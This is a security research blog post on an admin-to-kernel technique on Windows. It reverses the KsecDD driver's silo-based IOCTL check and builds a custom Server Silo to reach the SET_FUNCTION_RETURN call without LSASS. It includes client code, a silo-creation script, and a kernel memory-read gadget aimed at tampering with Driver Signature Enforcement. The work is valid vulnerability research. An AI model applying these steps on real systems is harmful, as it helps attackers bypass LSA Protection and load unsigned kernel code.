Earlier this year, an intriguing admin-to-kernel technique was published by @floesen_ in the form of a proof-of-concept (PoC) on GitHub. The author mentioned a strong limitation involving LSASS and Server Silos, without providing much detail about it. This piqued our interest, so we decided to give it a second look…

This blog post was coauthored by Clément Labro (@itm4n) and Romain Melchiorre (@PMa1n).

Admin to Kernel

In April 2024, @floesen_ published a PoC aptly named KExecDD on GitHub. In the README, they briefly explained that the built-in Windows driver KsecDD, which implements the Kernel Security Support Provider Interface, can be used by the Local Security Authority Subsystem Service (LSASS) to execute arbitrary kernel code.

A few days later, Claudio Contin, with Tier Zero Security, published an extended analysis of this PoC, and of the underlying vulnerability (or rather, feature), in a blog post titled LSASS rings KsecDD ext. 0. Therefore, we won’t discuss it in detail here. The gist of @floesen_’s finding, though, is that the KsecDD driver implements an IOCTL named SET_FUNCTION_RETURN (0x39006F), which allows a userland client to call an arbitrary kernel address with control over the first two arguments. This IOCTL is handled internally by the function ksecdd!KsecIoctlHandleFunctionReturn.
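For readers less familiar with IOCTL codes, a value such as 0x39006F follows the standard CTL_CODE bit layout from the Windows SDK. The portable C sketch below re-implements that layout (the macro is redefined here so the snippet compiles without the SDK; IoctlFields and decode_ioctl are names we made up). Decoding shows device type 0x39 (FILE_DEVICE_KSEC) and transfer method 3 (METHOD_NEITHER), which means the driver receives the caller’s buffer pointers as-is rather than a kernel copy.

```c
#include <assert.h>
#include <stdint.h>

/* Same bit layout as CTL_CODE in the Windows SDK (winioctl.h). */
#ifndef CTL_CODE
#define CTL_CODE(DeviceType, Function, Method, Access) \
    (((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method))
#endif

typedef struct {
    uint32_t device_type; /* bits 16-31, 0x39 = FILE_DEVICE_KSEC */
    uint32_t access;      /* bits 14-15, 0 = FILE_ANY_ACCESS */
    uint32_t function;    /* bits 2-13 */
    uint32_t method;      /* bits 0-1, 3 = METHOD_NEITHER */
} IoctlFields;

/* Split an I/O control code into its four fields. */
static IoctlFields decode_ioctl(uint32_t code) {
    IoctlFields f;
    f.device_type = code >> 16;
    f.access = (code >> 14) & 0x3u;
    f.function = (code >> 2) & 0xFFFu;
    f.method = code & 0x3u;
    return f;
}
```

With this layout, decode_ioctl(0x39006F) yields device type 0x39, access 0, function 0x1B and method 3, and CTL_CODE(0x39, 0x1B, 3, 0) rebuilds the original value.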

```c
// Note: The structures used below were created through reverse engineering. These are
// not official symbols. The content of 'req' is fully controlled by the client.

NTSTATUS KsecIoctlHandleFunctionReturn(KSEC_SET_FUNCTION_RETURN_REQ *req, DWORD size) {
    // ...snip...
    status = CallInProgressCompleted(req, req, size);
    // ...snip...
    return status;
}

NTSTATUS CallInProgressCompleted(KSEC_SET_FUNCTION_RETURN_REQ *req, KSEC_SET_FUNCTION_RETURN_REQ *req2, DWORD size) {
    KSEC_FUNCTION_RETURN *params;
    // ...snip...
    params = req->params;
    // Call the client-supplied function pointer ('code' is Ghidra's generic function type).
    (*(code *)params->Function)(params->Argument, req->Value, req2, size, params->unk);
    // ...snip...
    return 0;
}
```

The twist is that this feature is only accessible by LSASS, because it is the first process that connects to the driver when Windows boots. Any subsequent connection attempt fails because, according to the author, the driver allows only one session per Server Silo context. One way to work around this issue is therefore to inject code into LSASS and reuse the device handle already opened by the process, as implemented in the PoC. Of course, this wouldn’t work if LSASS ran as a Protected Process Light (PPL), as already pointed out by the author.

We were quite puzzled by this “Server Silo” limitation. How does this check work? What is a Server Silo in the first place? Can we create one ourselves? We will answer these questions as best as we can in this post.

The Server Silo Limitation

To start our analysis, we implemented a simple program that opens a handle on the driver and uses the IOCTLs CONNECT_LSA and SET_FUNCTION_RETURN. This is the typical workflow according to the README of the KExecDD proof-of-concept.

As expected, both calls fail, but with different error codes. The call to CONNECT_LSA, used to open the LSA interface, fails with a STATUS_NOT_SUPPORTED error (0xC00000BB), while the call to SET_FUNCTION_RETURN, used to execute code in the kernel, fails with a STATUS_ACCESS_DENIED error (0xC0000022). To understand this behavior, we decided to reverse engineer the KsecDD driver.
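Depending on how an IOCTL is sent, failures such as 0xC00000BB and 0xC0000022 surface either as raw NTSTATUS values or, when going through DeviceIoControl, as Win32 error codes returned by GetLastError. On Windows, the complete translation is performed by RtlNtStatusToDosError; the C sketch below only hard-codes the two entries relevant to this post, as an illustrative lookup table (StatusMapping and win32_error_for are our own names).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hand-written subset of the NTSTATUS -> Win32 error mapping (two entries only). */
typedef struct {
    uint32_t ntstatus;
    uint32_t win32;
} StatusMapping;

static const StatusMapping kMappings[] = {
    { 0xC00000BBu, 50u }, /* STATUS_NOT_SUPPORTED -> ERROR_NOT_SUPPORTED */
    { 0xC0000022u,  5u }, /* STATUS_ACCESS_DENIED -> ERROR_ACCESS_DENIED */
};

/* Returns the Win32 code for a known status, or UINT32_MAX if it is not in this table. */
static uint32_t win32_error_for(uint32_t status) {
    for (size_t i = 0; i < sizeof(kMappings) / sizeof(kMappings[0]); i++) {
        if (kMappings[i].ntstatus == status)
            return kMappings[i].win32;
    }
    return UINT32_MAX;
}
```

This is why a failed CONNECT_LSA call made through DeviceIoControl reports error 50 rather than 0xC00000BB.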

First, when an IOCTL is called, the function KsecFastIoDeviceControl performs some checks on the caller process to decide whether it is authorized to use the requested IOCTL. To do so, the driver retrieves a Silo Context object using the following code.

```c
struct _KSECDDLSASTATE* ReturnedSiloContext;
PsGetPermanentSiloContext(PsGetCurrentServerSilo(), KsecddSiloContextSlot, (PVOID *)&ReturnedSiloContext);
```

It should be noted that the driver monitors the creation and termination of Server Silos using nt!PsRegisterSiloMonitor and nt!PsUnregisterSiloMonitor. A quick analysis of the driver shows that the callbacks KsecdCreateSiloNotification and KsecdTerminateSiloNotification are automatically called whenever a Server Silo is created or terminated, respectively. It is then the responsibility of KsecdCreateSiloNotification to call PsCreateSiloContext and PsInsertPermanentSiloContext, which creates an object, inserts it into the Server Silo, and makes it retrievable with PsGetPermanentSiloContext. KsecDD then uses this object to store the data it needs to perform security and integrity checks on the Silo.

While this structure is relatively big and contains a lot of unknown fields, the only one that interests us in the context of our analysis is the first one. Indeed, it is the first piece of information checked by KsecFastIoDeviceControl after retrieving the Silo’s context.

```c
// Authorization check made based on the current Server Silo context
if (PsGetCurrentProcess() != ReturnedSiloContext->offset_0x00) {
    // ...snip...
}
```

If the current process matches the value stored in the first field of the Silo context, the driver authorizes the call. Otherwise, the function returns the status code STATUS_ACCESS_DENIED.

There are some exceptions to this behavior. For instance, the IOCTLs listed below are also allowed if the client is a protected process.

- IOCTL_KSEC_INSERT_PROTECTED_PROCESS_ADDRESS
- IOCTL_KSEC_REMOVE_PROTECTED_PROCESS_ADDRESS

```c
// Authorization check made based on the protection state of the client process
if ((PsIsProtectedProcess(PsGetCurrentProcess()) != 0 && (((int32_t)(IoControlCode - 0x39005c)) & 0xfffffffb) == 0)) {
    goto label_IOCTL_ACCESS_ALLOWED;
}
```

In a nutshell, the whole IOCTL authorization and dispatch logic is implemented in the internal function KsecFastIoDeviceControl, as depicted by the following code snippet.

```c
uint64_t KsecFastIoDeviceControl(int64_t arg1, int64_t arg2, int64_t* InputBuffer, unsigned long InputBufferLength, void* OutputBuffer, unsigned long OutputBufferLength, int32_t IoControlCode, int32_t* arg8) {
    struct _KSECDDLSASTATE* ReturnedSiloContext;

    // The driver retrieves the current silo context
    PsGetPermanentSiloContext(PsGetCurrentServerSilo(), KsecddSiloContextSlot, (PVOID *)&ReturnedSiloContext);
    // ...snip...

    // Check on the caller's process
    if (PsGetCurrentProcess() != ReturnedSiloContext->offset_0x00) {
        // Protected processes are allowed to use IOCTL_KSEC_INSERT_PROTECTED_PROCESS_ADDRESS
        // and IOCTL_KSEC_REMOVE_PROTECTED_PROCESS_ADDRESS
        if ((PsIsProtectedProcess(PsGetCurrentProcess()) != 0 && (((int32_t)(IoControlCode - 0x39005c)) & 0xfffffffb) == 0)) {
            goto label_IOCTL_ACCESS_ALLOWED;
        }
        if ((IoControlCode <= 0x390080 && IoControlCode >= 0x390028)) {
            switch (IoControlCode) {
                case IOCTL_KSEC_ALLOC_POOL:
                // ...snip...
                case IOCTL_KSEC_IPC_GET_QUEUED_FUNCTION_CALLS:
                case IOCTL_KSEC_IPC_SET_FUNCTION_RETURN:
                    return STATUS_ACCESS_DENIED;
                default:
                    return STATUS_NOT_SUPPORTED;
            }
        }
    } else {
label_IOCTL_ACCESS_ALLOWED:
        switch (IoControlCode) {
            case IOCTL_KSEC_ALLOC_POOL:
            // ...snip...
            case IOCTL_KSEC_IPC_SET_FUNCTION_RETURN:
                return KsecIoctlHandleFunctionReturn(InputBuffer, 0x10);
            default:
                return STATUS_NOT_SUPPORTED;
        }
    }
    // ...snip...
}
```

While the analysis of KsecFastIoDeviceControl showed that the authorization check relies on information stored in the Server Silo’s context, we had yet to figure out what exactly this object contains.
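One detail of the dispatch code above is worth spelling out: the protected-process exception relies on a compact bit trick. Subtracting 0x39005C and then clearing bit 2 (mask 0xFFFFFFFB) leaves zero only when the difference is 0 or 4. The portable C sketch below re-implements that expression (the function names are ours) and checks it against the range handled by the switch, 0x390028 to 0x390080. It matches exactly two codes, 0x39005C and 0x390060; that they correspond to IOCTL_KSEC_INSERT_PROTECTED_PROCESS_ADDRESS and IOCTL_KSEC_REMOVE_PROTECTED_PROCESS_ADDRESS, respectively, is our assumption based on the comments in the decompiled code.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Mirrors ((IoControlCode - 0x39005c) & 0xfffffffb) == 0 from the decompiled code,
 * using unsigned arithmetic so that wrap-around is well defined. */
static bool is_protected_process_ioctl(uint32_t ioctl) {
    return ((ioctl - 0x39005Cu) & 0xFFFFFFFBu) == 0;
}

/* Counts how many codes in [first, last] pass the check. */
static unsigned count_matches(uint32_t first, uint32_t last) {
    unsigned n = 0;
    for (uint32_t code = first; code <= last; code++) {
        if (is_protected_process_ioctl(code))
            n++;
    }
    return n;
}
```

In particular, SET_FUNCTION_RETURN (0x39006F) never benefits from this exception, even for a protected caller.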

To better understand what the Silo’s context contains, we decided to take a look at the CONNECT_LSA operation, which is handled by KsecDeviceControl. While inspecting this function, we observed that, after several checks, a reference to the process that invoked CONNECT_LSA is stored in the Silo’s context.

```c
PEPROCESS currentProcess = PsGetCurrentProcess();
SiloContext->offset_0x00 = currentProcess;
```

This explains the check performed in KsecFastIoDeviceControl that we mentioned earlier.

```c
if (PsGetCurrentProcess() != ReturnedSiloContext->offset_0x00) {
    // ...snip...
}
```

Once a process has successfully invoked CONNECT_LSA, only this process can invoke the other IOCTLs exposed by the driver, with a few exceptions, as we saw earlier. Since this rule applies to most of them, and in particular to the ones we are interested in, we’ll accept this simplification.

The code snippet below provides an overview of the implementation of CONNECT_LSA.

```c
uint64_t KsecDeviceControl(uint8_t** arg1, int32_t arg2, int32_t* OutputBuffer, int32_t* OutputBufferLength, uint64_t IoControlCode, IRP* arg6) {
    struct _KSECDDLSASTATE SiloContext;
    // ...snip...
    switch (IoControlCode) {
        // ...snip...
        // Is the invoked IOCTL "CONNECT_LSA"?
        case IOCTL_KSEC_CONNECT_LSA:
            if (!KsecddLsaStateRef::IsValid(&SiloContext)) {
                return STATUS_SHUTDOWN_IN_PROGRESS;
            } else if (SiloContext->offset_0x00 != 0) { // [2]
                // If a reference to a process is already in the silo's context,
                // then the operation fails with a STATUS_NOT_SUPPORTED error.
                return STATUS_NOT_SUPPORTED; // [2]
            } else if ((InputBuffer == 0 || InputBufferLength < 4)) {
                return_status = STATUS_BUFFER_TOO_SMALL;
            } else {
                PEPROCESS currentProcess = PsGetCurrentProcess(); // [1]
                // A reference to the current process is set in the Silo's context,
                // making all subsequent connection attempts fail.
                SiloContext->offset_0x00 = currentProcess; // [1]
                // ...snip...
                return_status = STATUS_SUCCESS;
            }
            // ...snip...
    }
    return STATUS_NOT_SUPPORTED;
}
```

We can see that, if the first field of the current Silo’s context is not yet initialized, the driver retrieves a reference to the current process and uses it to initialize this field (1). Otherwise, if this field is already initialized in the current Silo context, the function returns the error STATUS_NOT_SUPPORTED (2). This explains the behavior we observed earlier while trying to use this IOCTL. Indeed, in the main Server Silo (i.e. the one representing the host), LSASS has already connected to the interface during the startup of the operating system, which makes it impossible to open the interface from any other process.

This is why it is necessary to hijack the device handle already opened by LSASS. However, this operation requires arbitrary code to be injected into the process, which cannot be done when LSA Protection is enabled.
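The ownership rule implemented by CONNECT_LSA and KsecFastIoDeviceControl boils down to a few lines of logic. The following C sketch is a simplified user-mode model, not driver code: SiloContext, owner_pid, connect_lsa and set_function_return are hypothetical stand-ins for the first field of _KSECDDLSASTATE and the two IOCTL handlers, and process IDs replace EPROCESS pointers.

```c
#include <assert.h>
#include <stdint.h>

typedef uint32_t status_t;
#define ST_SUCCESS       0x00000000u
#define ST_NOT_SUPPORTED 0xC00000BBu /* STATUS_NOT_SUPPORTED */
#define ST_ACCESS_DENIED 0xC0000022u /* STATUS_ACCESS_DENIED */

/* Hypothetical model of the per-silo state: only the first field matters here. */
typedef struct {
    uint32_t owner_pid; /* 0 until a process successfully calls CONNECT_LSA */
} SiloContext;

/* CONNECT_LSA: the first caller in a silo becomes its owner [1]; later callers fail [2]. */
static status_t connect_lsa(SiloContext *ctx, uint32_t caller_pid) {
    if (ctx->owner_pid != 0)
        return ST_NOT_SUPPORTED;
    ctx->owner_pid = caller_pid;
    return ST_SUCCESS;
}

/* SET_FUNCTION_RETURN: only the owner of the caller's silo gets through. */
static status_t set_function_return(const SiloContext *ctx, uint32_t caller_pid) {
    if (ctx->owner_pid != caller_pid)
        return ST_ACCESS_DENIED;
    return ST_SUCCESS; /* the real driver would now call the supplied function */
}
```

For example, if LSASS (PID 700 in this made-up scenario) connects first in the host silo, another process receives ST_NOT_SUPPORTED from connect_lsa and ST_ACCESS_DENIED from set_function_return. The same process is accepted, however, if it is the first one to connect in a separate SiloContext, which is precisely the idea explored in the rest of this post.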

At this point, we decided to move forward and learn more about Server Silos, to figure out whether and how they could be used to overcome this limitation and allow us to connect to KsecDD’s LSA interface without having to interact with LSASS.

Windows Containers

At this point, we both remembered a few blog posts we had previously read about Server Silos / Windows Containers.

- Who Contains the Containers? by James Forshaw, Google Project Zero (April, 2021)

- Reversing Windows Container, episode I: Silo by Lucas Di Martino, Quarkslab (September, 2023)

- Reversing Windows Container, episode II: Silo to Server Silo by Lucas Di Martino, Quarkslab (March, 2024)

Essentially, Server Silos on Windows are what we most commonly refer to as Containers on other platforms. However, it is important to note that, on Windows, there are two types of containers: the ones that run inside a Hyper-V Virtual Machine, and the ones that rely on Process Isolation.

When backed by Hyper-V, a container interacts with a kernel isolated from the one used by the host operating system (OS). Therefore, achieving admin-to-kernel in this context would be pretty much useless. Where it gets more interesting is when a container is created in “process isolation” mode, because the kernel is shared with the host in that case.

The most popular way to create containers is through Docker Desktop. However, by default, Docker creates Linux containers in virtual machines, as explained in the blog post Reversing Windows Container, episode I: Silo. Nevertheless, they also explain that it is possible to configure it to create Windows containers in “process isolation” mode instead. So, the question is, can we use such containers to connect to KsecDD, and thus gain access to the host’s kernel?

Using Docker in “process isolation” mode, we ran some experiments to determine how LSASS behaves inside a container, depending on the configuration of the host. The ultimate question was: “is it possible to get LSASS to run unprotected inside a container while LSA Protection is enabled on the host?” Indeed, if we could run LSASS unprotected inside a Docker container (i.e. in a new Server Silo), we would be able to reuse @floesen_’s proof-of-concept to compromise the host’s kernel.

At this point, and before we go deeper into the subject, we think it’s important to start with a quick refresher about some aspects of LSA Protection that are particularly relevant in our context. As you already know, when this protection is enabled, LSASS runs as a Protected Process Light (PPL), and therefore cannot be accessed with extended rights, even by an administrator, or SYSTEM. There is a slight nuance, though, that is less commonly discussed. This protection can be configured through the registry key HKLM\SYSTEM\CurrentControlSet\Control\Lsa and the value RunAsPPL, but this setting is not just an on (1) / off (0) switch. In reality, it accepts 3 values:

- RunAsPPL=0: LSA Protection is disabled and LSASS runs unprotected;
- RunAsPPL=1: LSA Protection is enabled with UEFI lock;
- RunAsPPL=2: LSA Protection is enabled without UEFI lock.

When LSA Protection is enabled with UEFI lock (RunAsPPL=1), the state of the protection is stored in a UEFI variable, i.e. in the machine’s firmware. Therefore, any subsequent modification of the setting in the registry has no effect on the protection; it will remain active. On the other hand, when LSA Protection is enabled without UEFI lock (RunAsPPL=2), it will be disabled after a reboot as soon as RunAsPPL is set to 0 or deleted.

In our context, it is therefore interesting to ask ourselves how this setting affects the state of LSA Protection in a container. To find out, we added the following command to our Dockerfile, so that the registry value RunAsPPL is set to 0 when the container is built.

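```dockerfile
RUN New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 0 -PropertyType DWord
```

Then, we observed the protection level of LSASS in the container, depending on the value of RunAsPPL on the host. The result of this experiment can be summarized as follows.

- RunAsPPL=0 on the host: LSASS runs unprotected in the container;
- RunAsPPL=1 on the host: LSASS runs as a PPL in the container;
- RunAsPPL=2 on the host: LSASS runs unprotected in the container.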

The behavior observed in the container mimics the behavior that we would observe on the host, and this result is actually totally logical. When the container starts, it runs a new LSASS process, just as the host would. Therefore, if the UEFI variable is not set (RunAsPPL=0 or RunAsPPL=2 on the host), the OS checks the registry value and starts LSASS unprotected. Otherwise, if RunAsPPL=1, the UEFI variable is set and the check performed at the start of the container does not differ from the one performed at the start of the operating system and results in the registry value being ignored.
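The decision described above fits in a small truth table. The C function below is our simplified model of that behavior, not Windows code: uefi_lock_set stands for the firmware variable written when RunAsPPL=1 is applied on the host (assuming the host has rebooted at least once with that value), and run_as_ppl for the registry value seen by the system or container being started. Both function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>

/* Simplified model: does LSASS start as a PPL? */
static bool lsass_starts_as_ppl(bool uefi_lock_set, unsigned run_as_ppl) {
    if (uefi_lock_set)
        return true;                          /* the registry value is ignored */
    return run_as_ppl == 1 || run_as_ppl == 2; /* otherwise the registry decides */
}

/* Only RunAsPPL=1 on the host leads to the UEFI variable being set. */
static bool uefi_lock_from_host(unsigned host_run_as_ppl) {
    return host_run_as_ppl == 1;
}
```

With the container’s registry value forced to 0 by the Dockerfile, lsass_starts_as_ppl(uefi_lock_from_host(host), 0) is true only when the host uses RunAsPPL=1, which matches the three cases listed above.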

In conclusion, we have a slight improvement over the initial proof-of-concept. Indeed, on a host on which LSA protection is enabled without UEFI lock, we managed to build a container with RunAsPPL set to 0, start the container, and reuse the initial PoC. This enabled the exploitation of the driver without having to reboot the host.

However, in most cases, LSA Protection is enabled with UEFI lock, which would still prevent the exploitation of the driver. Relying on Docker to do the job for us just won’t cut it. We’ll need to get our hands dirty.

Creating our own Server Silo

In the previous part, we saw that it was possible to create a Docker container in process isolation mode, and thus work around LSA Protection in a particular case, without a reboot of the host. This is progress, but it isn’t satisfying enough.

The problem with our initial approach is that it assumes that all the components and layers automatically added by Docker are required for the container to run. In particular, as explained in the blog post by Quarkslab, this implies that the following processes are always added.

- smss.exe
- conhost.exe
- wininit.exe
- lsass.exe

Because LSASS is already running, we face the same issues we had on the host. The question is, can’t we just create our own Server Silo, and start our own application acting as LSASS, so that we can connect to the KsecDD driver without intermediaries?

Thankfully for us, Quarkslab already did all the heavy lifting by reverse engineering how Docker interacts with the Host Compute Service to create Server Silos. They even provided a proof-of-concept code showing how to create a Silo. This was an immense boost for our own research.

Basically, you first need to create a Job object, then you need to convert this Job object into a Silo, and finally, you can convert the Silo into a Server Silo. All of this is achieved through the native API. The only thing to note is that SeTcbPrivilege is required for the last steps.

We made a first implementation of this in C/C++, which worked fine until we tried to convert the Silo into a Server Silo, which ultimately resulted in a crash of the OS. At that point, we had two options: either dive into a potentially time-consuming debugging session, or search for existing open-source implementations on the Internet.



We realized soon enough that the second option was definitely the best one when we came across the source code of the New-NtJob PowerShell cmdlet of the NtObjectManager library on GitHub, developed by none other than James Forshaw. This command has a convenient CreateServerSilo switch parameter, which suggests that this feature is already implemented in the library.

Our initial attempt to use this cmdlet also resulted in a system crash, but after fiddling around with the parameters for a bit, we eventually figured out how to get it to work. First, we opened a command prompt as NT AUTHORITY\SYSTEM, because administrators don’t have SeTcbPrivilege by default.

Import-Module NtObjectManager

$user = Get-NtSid -KnownSid LocalSystem



$proc = Start-Win32ChildProcess -CommandLine "powershell -ep bypass" -User $userThe following snippet then shows how to create a Server Silo and add a new cmd.exe process to it.

```powershell
Import-Module NtObjectManager

# Create a Server Silo
$evt = New-NtEvent -InitialState $false -EventType NotificationEvent
$silo = New-NtJob -CreateServerSilo -SiloRootDirectoryFlags All -SystemRoot "C:\Windows" -DeleteEvent $evt

# Create a process in the Server Silo
$pc = New-NtProcessConfig -Win32Path "C:\Windows\System32\cmd.exe" -ThreadFlags Suspended
$al = New-Object System.Collections.Generic.List[NtCoreLib.NtJob]
$al.Add($silo)
$pc.AddAttribute([NtCoreLib.Kernel.Process.ProcessAttribute]::JobList($al))
$p = [NtCoreLib.NtProcess]::Create($pc)
$p.Thread.Resume()

# Once done, terminate the Server Silo to clean up resources
$silo.Terminate(0)
$silo.Close()
```

As a result, a new command prompt window spawns on the desktop. To verify that the new process is indeed in the Server Silo, we can first enumerate the process IDs with the method GetProcessIdList. Here, the list contains the PIDs 15808 and 22304. Finally, using System Informer, we can see that these processes are indeed in a job.



We can also check the Silo’s basic information to get its ID, and use WinObj to find its resources under \Silos\ in the object manager namespace.

And that’s it! We now have the ability to create a custom Server Silo from scratch, and execute an arbitrary process within it. This shows that we don’t need base system processes such as csrss.exe or lsass.exe to run arbitrary code in the container.

Connecting to KsecDD from a Silo

Now that we know we can create a Server Silo manually, we want to know whether it is possible to connect to the KsecDD driver from within such a container. To do so, we can create a very basic client application that will run in the Silo, in place of cmd.exe (like we did in the previous part). This application will first open the device \Device\KsecDD, and then send the CONNECT_LSA IOCTL.

LPCWSTR pwszDevicePath = L"\\Device\\KsecDD";

NTSTATUS status;

UNICODE_STRING usDevicePath = { 0 };

OBJECT_ATTRIBUTES oa = { 0 };

IO_STATUS_BLOCK iosb = { 0 };

HANDLE hDevice = NULL;

DWORD dwSystemPid = 0;

BOOL bResult = FALSE;

RtlInitUnicodeString(&usDevicePath, pwszDevicePath);

InitializeObjectAttributes(&oa, &usDevicePath, 0, NULL, NULL);

// Open \Device\KsecDD with the syscall NtOpenFile.

wprintf(L"Opening device %ws...\n", pwszDevicePath);

status = NtOpenFile(

&hDevice, // FileHandle

GENERIC_READ | GENERIC_WRITE, // DesiredAccess

&oa, // ObjectAttributes

&iosb, // IoStatusBlock

FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess

0 // OpenOptions

);

if (NT_SUCCESS(status)) {

// The device was successfully opened, so send the "CONNECT_LSA" IOCTL.

wprintf(L"Attempting to connect to KsecDD...\n");

bResult = DeviceIoControl(

hDevice, // hDevice

IOCTL_KSEC_CONNECT_LSA, // dwIoControlCode

NULL, // lpInBuffer

0, // nInBufferSize

&dwSystemPid, // lpOutBuffer

sizeof(dwSystemPid), // nOutBufferSize

NULL, // lpBytesReturned

NULL // lpOverlapped

);

if (bResult) {

wprintf(L"Connected to KsecDD!\n");

} else {

wprintf(L"DeviceIoControl err=%d\n", GetLastError());

}

NtClose(hDevice);

} else {

wprintf(L"NtOpenFile err=0x%08x\n", status);



}A connection was first attempted on the host, in the main Server Silo, and failed with the error code 50 (“not supported”), which is equivalent to the NT status code 0xC00000BB, as expected. Then the same PoC was used in the manually created Server Silo, and the connection succeeded!

As it turns out, we later realized that we had been lucky this worked on the first attempt. This test was performed on a fully up-to-date Windows 11 machine, but had we first done it on Windows 10, we would have observed a different outcome: in that case, DeviceIoControl just hangs forever.

- Windows 10 22H2 19045.4842 + ksecdd.sys 10.0.19041.4239 -> DeviceIoControl hangs.
- Windows 11 23H2 22631.4112 + ksecdd.sys 10.0.22621.3810 -> OK.

Although we didn’t want to spend too much time debugging the kernel, this behavior diverged so significantly from what we observed on Windows 11 that we decided to investigate it anyway.

We started by setting a breakpoint on the IOCTL dispatch function, so that we could walk down the call tree from there. In doing so, we were able to pinpoint the issue in the internal function ksecdd!CreateClient relatively quickly.

```text
ksecdd!KsecDispatch
\__ ksecdd!KsecddLsaStateRef::KsecddLsaStateRef -> OK
    ksecdd!KsecddLsaStateRef::IsValid -> OK
    ksecdd!KsecddLsaStateRef::operator _KSECDDLSASTATE * __ptr64 -> OK
    ntkrnlmp!PsGetCurrentProcess -> OK
    ntkrnlmp!ObfReferenceObject -> OK
    ksecdd!InitSecurityInterfaceW -> process hanging there... (1st iteration)
    \__ ksecdd!IsOkayToExec -> process hanging there... (2nd iteration)
        \__ ksecdd!LocateClient -> OK
            ksecdd!CreateClient -> process hanging there... (3rd iteration)
```

At some point in this function, ZwWaitForSingleObject is called on an Event object with an infinite timeout. Therefore, as long as that event is not signaled, this system call does not return.

HANDLE hEvent = NULL;

// OpenSyncEvent is an internal function that calls ZwOpenEvent to open

// a global event named \SECURITY\LSA_AUTHENTICATION_INITIALIZED.

if (OpenSyncEvent(&hEvent)) {

ZwWaitForSingleObject(

hEvent, // HANDLE Handle

FALSE, // BOOLEAN Alertable

NULL // PLARGE_INTEGER Timeout, no timeout means INFINITE

);

ZwClose(hEvent);



}Using WinObj64, we observed that this Event object was automatically created in the Server Silo in a non-signaled state.

This event is normally handled by LSASS, but the implementation differs slightly between Windows 10 and Windows 11, which explains the discrepancy we observed through experimentation. In any case, this problem is easy to solve: we just have to signal the event before initiating the connection to the KsecDD driver in the Silo.

```c
// Reuses the 'oa' and 'status' variables from the previous snippet.
UNICODE_STRING usEventPath = { 0 };
HANDLE hEvent = NULL;

RtlInitUnicodeString(&usEventPath, L"\\SECURITY\\LSA_AUTHENTICATION_INITIALIZED");
InitializeObjectAttributes(&oa, &usEventPath, OBJ_CASE_INSENSITIVE, NULL, NULL);

// Open the event with the right to change its state
status = NtOpenEvent(&hEvent, EVENT_MODIFY_STATE, &oa);
wprintf(L"NtOpenEvent: 0x%08x\n", status);

if (NT_SUCCESS(status)) {
    // Signal the event so that the driver no longer waits on it
    SetEvent(hEvent);

    // ...
    // Do stuff
    // ...

    NtClose(hEvent);
}
```

After adding this code, we were able to connect to KsecDD on both Windows 10 and Windows 11. At this point, we were quite confident this was the last obstacle we would have to overcome, and that the rest would just be relatively basic kernel exploitation. Spoiler alert: it wasn’t!

A Kernel Read Primitive



The initial proof-of-concept, published by @floesen_, used a memory write gadget to set the global variable ci!g_CiOptions to 0. This is a well-known trick for disabling Driver Signature Enforcement (DSE), and thus allowing unsigned kernel drivers to be loaded at a later time. As pointed out by the author, though, the immediate risk is that a Blue Screen of Death (BSoD) will be triggered as soon as Kernel Patch Protection (KPP), also known as PatchGuard, detects the tampering.

We could work around this last issue by restoring the value of ci!g_CiOptions as soon as we have loaded our unsigned driver, but this poses another problem. Usually, the default value of ci!g_CiOptions is 0x00000006, but it could also very well be 0x00004006, or any other combination of undocumented flags. Therefore, to be able to restore the value of ci!g_CiOptions properly, or even to execute a more sophisticated exploit chain, we need a memory read gadget.



Finding such a gadget will be a bit trickier, though. So, let’s start with a recap of the registers we control when the user-supplied function address is called.

RAX (i.e. the target function address) will contain the address of the gadget we are looking for, so there is nothing special to say about it. RCX is fully controlled, and can be whatever we want. Unfortunately, we don’t fully control RDX, but only its lower 32 bits (i.e. EDX). Finally, it is worth noting that R8 contains the address of our supplied buffer (the req2 argument in the pseudo-code shown earlier).

Based on this knowledge, we used rp++ to find gadgets in ntoskrnl.exe that would allow us to read a value at an arbitrary address and write it to a location we control. As an additional constraint, we wanted the gadget to be as simple as possible, to avoid undesired side effects that could lead to a kernel crash.

Surprisingly, we could find only one gadget that met all these criteria. It is located in nt!ViThunkReplacePristine, and exists at least since version 10.0.10240.16384 of the kernel, so it should be pretty reliable.

```asm
mov rax, qword ptr [rcx+0x10] ; read 64-bit value @ RCX+0x10, and write it in RAX
mov qword ptr [r8], rax       ; write value of RAX in memory @ R8
mov eax, 0x1                  ; write 0x01 in EAX
ret                           ; return
```

It starts by reading 64 bits of data in memory at the address RCX+0x10, so we have to take that into account and subtract 0x10 from the actual address. The data is written into RAX, and then the value of RAX is itself written to memory at the address stored in R8. Finally, EAX is set to 1, and the gadget returns. This is convenient because, at this point, R8 holds the address of our input buffer. This way, we can repurpose our user-supplied buffer to retrieve the data in user space.
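To make the register usage concrete, the following portable C sketch emulates the gadget in user mode: rcx, edx and r8 become plain parameters, and ordinary variables play the role of kernel memory. FakeRequest, emulate_read_gadget and read64_via_gadget are hypothetical names; the only goal is to show why the target address is adjusted by 0x10 and why the result lands in the first 8 bytes of the caller’s own buffer.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical request layout: the gadget overwrites the first 8 bytes (at R8). */
typedef struct {
    uint64_t first_qword; /* the FUNCTION_RETURN pointer in the PoC */
    uint32_t value;       /* passed in EDX */
} FakeRequest;

/* Emulates: mov rax, [rcx+0x10] / mov [r8], rax / mov eax, 0x1 / ret */
static uint32_t emulate_read_gadget(uintptr_t rcx, uint32_t edx, void *r8) {
    uint64_t rax;
    (void)edx;                                              /* EDX is not used by the gadget */
    memcpy(&rax, (const void *)(rcx + 0x10), sizeof(rax)); /* mov rax, [rcx+0x10] */
    memcpy(r8, &rax, sizeof(rax));                          /* mov [r8], rax */
    return 1;                                               /* mov eax, 0x1 */
}

/* Reads 8 bytes at addr by passing addr - 0x10 as RCX, then takes the result from the request. */
static uint64_t read64_via_gadget(uintptr_t addr) {
    FakeRequest req = {0};
    emulate_read_gadget(addr - 0x10, req.value, &req);
    return req.first_qword;
}
```

In this model, read64_via_gadget on a variable holding 0x6 returns 0x6, mirroring how the PoC reads the overwritten first field of its request after the IOCTL returns.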

